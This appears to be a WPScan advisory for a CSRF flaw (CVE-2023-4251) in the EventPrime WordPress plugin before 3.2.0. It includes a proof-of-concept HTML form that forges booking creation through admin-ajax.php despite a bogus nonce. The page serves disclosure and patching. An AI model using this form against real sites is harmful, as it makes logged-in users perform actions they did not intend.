WordPress Plugin Vulnerabilities

EventPrime < 3.2.0 - Booking Creation via CSRF

Description

The plugin does not have CSRF checks when creating bookings, which could allow attackers to make logged in users create unwanted bookings via CSRF attacks.

Proof of Concept

Create an Event, noting its ID. Add a ticket type to the Event (the details don't matter).

As a logged-in user, visit a page with the following form, replace the event ID, and submit the form. Note that a new Booking is created, despite the incorrect nonce.

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="text" name="action" value="ep_save_event_booking" />
      <textarea name="data">
ep_event_booking_event_id=EVENT_ID&ep_event_booking_user_id=1&ep_event_booking_total_price=0&ep_event_booking_total_tickets=1&ep_save_event_booking_nonce=1234
      </textarea>
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
eventprime-event-calendar-management
Fixed in 3.2.0

References

CVE
CVE-2023-4251

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
Alex Sanford
Submitter
Alex Sanford
Submitter website
https://wpscan.com
Verified
Yes
WPVDB ID
ce564628-3d15-4bc5-8b8e-60b71786ac19

Timeline

Publicly Published
2023-10-09 (about 7 months ago)
Added
2023-10-09 (about 7 months ago)
Last Updated
2023-10-11 (about 7 months ago)

Other

Published
Title
Published
2023-09-12
Title
Quiz And Survey Master < 8.1.16 - Cross-Site Request Forgery via 'display_results'
Published
2022-09-29
Title
Analytify < 4.2.3 - Cache Deletion via CSRF
Published
2014-08-01
Title
Mathjax Latex 1.1 - Setting Manipulation CSRF
Published
2024-04-11
Title
Church Content – Sermons, Events and More < 2.6.1 - Cross-Site Request Forgery to Notice Dismissal
Published
2024-05-09
Title
Unyson < 2.7.31 - Cross-Site Request Forgery